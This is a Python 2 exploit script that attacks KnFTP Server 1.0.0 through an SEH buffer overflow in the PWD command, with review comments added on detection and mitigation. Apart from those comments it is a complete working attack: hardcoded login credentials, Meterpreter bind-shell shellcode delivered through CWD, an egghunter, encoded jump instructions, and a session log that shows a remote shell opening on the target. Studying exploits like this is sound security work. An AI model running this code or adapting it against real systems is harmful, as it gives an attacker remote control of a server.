#!/usr/bin/python
import socket
#
#root@nasro:~/xploits/knftpd# python exploit.py
#[*]Connecting ...
#[*]Sending USER and PASS ...
#[*]Sending Shellcode ...
#[*]Triggering the crash ...
#[*]Done, connect to Meterpreter on port 4444.
#
#msf exploit(handler) > run
#[*] Starting the payload handler...
#[*] Started bind handler
#[*] Sending stage (885806 bytes) to 192.168.1.201
#[*] Meterpreter session 1 opened (192.168.1.7:47489 -> 192.168.1.201:4444) at 2015-10-24 12:21:19 -0400
#meterpreter >
#
# Exploit Title: KnFTP Server 1.0.0 <- "PWD" SEH buffer overflow
# Date: 25/10/2015
# Exploit Author: Nasro
# Writeup : https://rootatnasro.wordpress.com/2015/10/25/windows-exploit-developement-the-hard-way/
# Vendor Homepage:
# Software Link: https://www.exploit-db.com/apps/182e4b13190ed23c06c8647dda9198dd-knftpd-1.0.0-bin.zip
# Version: 1.0.0
# Tested on: Windows XP SP3
# ---------------------------------------------------------------------------
# Payload layout.
#
# This file is Python 2 only (it uses the `print "..."` statement form), so
# every string literal below is a byte string and can be passed straight to
# socket.send(); under Python 3 they would be text objects and send() would
# refuse them.  Review notes are written from a detection/mitigation angle:
# the exploit mechanics themselves are documented by the author's own
# comments and are not expanded on here.
# ---------------------------------------------------------------------------
junk = "\x90"*200 # junk data
# Only the low three bytes of the handler address 0x004011CB are sent
# ("startnull" in the author's note: the address begins with 0x00).  The
# author's annotation records the properties this relies on: the target module
# knftpd.exe has no SafeSEH and is not rebased.  Those are exactly the
# properties that /SAFESEH, SEHOP, DEP and ASLR remove, which is consistent
# with the header listing only Windows XP SP3 as a tested platform.
seh = "\xcb\x11\x40" # pop pop ret 0x004011CB | startnull {PAGE_EXECUTE_READ} [knftpd.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False
#metasm > jmp $-28
#"\xeb\xe2"
# Two bytes of opcode plus two bytes of padding; the "28 bytes" figure is the
# author's, taken from the metasm listing above.
jmp_back="\xeb\xe2\xff\xff" # jmp back 28 bytes
#AND EAX,41414141
#AND EAX,3E3E3E3E
#SUB EAX,4B4A687D
#SUB EAX,6A3C0951
#SUB EAX,4A3B5468
#NOP
# Encodes the target value 0x003E38DF with the AND/SUB sequence listed above
# (the author's comment gives the expected EAX result).  The encoded form
# avoids the bytes the server rejects; the -b "\x00\xff" option on the
# msfvenom line below shows which bytes those are.
ret_addr_decode ="\x25\x41\x41\x41\x41\x25\x3E\x3E\x3E\x3E\x2D\x7D\x68\x4A\x4B\x2D\x51\x09\x3C\x6A\x2D\x68\x54\x3B\x4A\x50\x90" #EAX=003E38DF
#metasm > jmp eax
#"\xff\xe0"
jmp_eax="\xFF\xE0" #JMP EAX
#msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -b "\x00\xff" -f py
#Payload size: 326 bytes
# The stage is prefixed with the doubled tag "T00WT00W" so the egghunter
# (tag "W00T", below) can locate it in memory after it has been delivered via
# the earlier CWD command.  It is a bind payload: the compromised host opens
# TCP/4444 and waits, so a host- or network-level alert on an unexpected
# listening port on an FTP server is a direct post-exploitation indicator.
shellcode = ( "T00WT00W"+"\xbe\xbd\x5e\x57\xba\xdb\xc0\xd9\x74\x24\xf4\x58\x31"
"\xc9\xb1\x4b\x31\x70\x15\x83\xc0\x04\x03\x70\x11\xe2"
"\x48\xa2\xbf\x38\xb2\x5b\x40\x5d\x3b\xbe\x71\x5d\x5f"
"\xca\x22\x6d\x14\x9e\xce\x06\x78\x0b\x44\x6a\x54\x3c"
"\xed\xc1\x82\x73\xee\x7a\xf6\x12\x6c\x81\x2a\xf5\x4d"
"\x4a\x3f\xf4\x8a\xb7\xcd\xa4\x43\xb3\x63\x59\xe7\x89"
"\xbf\xd2\xbb\x1c\xc7\x07\x0b\x1e\xe6\x99\x07\x79\x28"
"\x1b\xcb\xf1\x61\x03\x08\x3f\x38\xb8\xfa\xcb\xbb\x68"
"\x33\x33\x17\x55\xfb\xc6\x66\x91\x3c\x39\x1d\xeb\x3e"
"\xc4\x25\x28\x3c\x12\xa0\xab\xe6\xd1\x12\x10\x16\x35"
"\xc4\xd3\x14\xf2\x83\xbc\x38\x05\x40\xb7\x45\x8e\x67"
"\x18\xcc\xd4\x43\xbc\x94\x8f\xea\xe5\x70\x61\x13\xf5"
"\xda\xde\xb1\x7d\xf6\x0b\xc8\xdf\x9f\xf8\xe0\xdf\x5f"
"\x97\x73\x93\x6d\x38\x2f\x3b\xde\xb1\xe9\xbc\x21\xe8"
"\x4d\x52\xdc\x13\xad\x7a\x1b\x47\xfd\x14\x8a\xe8\x96"
"\xe4\x33\x3d\x02\xee\x92\xee\x30\x0d\x4e\x0e\xde\xec"
"\xe7\xfa\x11\x2e\x17\x05\xf8\x47\xb0\xf8\x02\x79\x1d"
"\x74\xe4\x13\x8d\xd0\xbf\x8b\x6f\x07\x08\x2b\x8f\x6d"
"\xf3\x73\x1a\xd6\xac\x1b\x52\x0f\x6a\x23\x63\x05\xdd"
"\xb3\xe8\x4a\xda\xa2\xee\x46\x4b\xb2\x79\x1c\x1d\xf1"
"\x18\x21\x34\x63\xdb\xb7\xb2\x22\x8c\x2f\xb8\x13\xfa"
"\xef\x43\x76\x78\xf7\xbb\x07\x52\x83\x8d\x9d\xec\xfb"
"\xf1\x71\xed\xfb\xa7\x1b\xed\x93\x1f\x78\xbe\x86\x60"
"\x55\xd2\x1a\xf4\x56\x83\xcf\x5f\x3f\x29\x29\x97\xe0\xd2"
"\x1c\xa4\xe7\x2d\xe1\xad\x16\xed\x34\x77\x6d\x18\x85")
#tag: W00T
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# Final PWD argument, in order: 200 NOPs, the egghunter, 59 more NOPs, the
# EAX decoder, JMP EAX, the short backwards jump, and the 3-byte SEH
# overwrite.  The total is well over 300 bytes; RFC 959 defines PWD as taking
# no parameter at all, so an FTP-aware IDS/proxy rule that rejects or alerts
# on any PWD argument (or on non-printable command arguments of this length)
# would flag this session before the handler overwrite occurs.
buffer = junk + egghunter + "\x90"*59 + ret_addr_decode + jmp_eax + jmp_back + seh
# ---------------------------------------------------------------------------
# Network exchange.  The target host is hard-coded and no socket timeout is
# set, so every recv() below can block indefinitely if the server stops
# answering (e.g. after the crash).  Nothing the server returns is checked:
# the script proceeds on the assumption that USER/PASS are accepted.
# ---------------------------------------------------------------------------
print "[*]Connecting ..."
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None; the assignment keeps nothing useful.
connect=s.connect(('192.168.1.201',21))
s.recv(1024)
# Authentication uses the literal credentials test/test; the overflow itself
# is in a post-login command, so the vulnerable code path is only reachable
# by an authenticated user.  Restricting or removing default/guest accounts
# therefore narrows exposure even where the server cannot be patched.
print "[*]Sending USER and PASS ..."
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
# The stage is delivered as a CWD argument purely so that it is resident in
# the server process for the egghunter to find; CWD with a ~330-byte,
# mostly non-ASCII argument is itself anomalous and loggable.
print "[*]Sending shellcode ..."
s.send('CWD ' + shellcode + '\r\n')
s.recv(1024)
# The oversized PWD argument is what overwrites the SEH record.
print "[*]Triggering the crash, ph33r ..."
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
# NOTE: `s.close` without parentheses is an attribute lookup, not a call;
# the socket is never explicitly closed and is only released when the
# interpreter exits.
s.close
print "[*]Done, connect to Meterpreter on port 4444."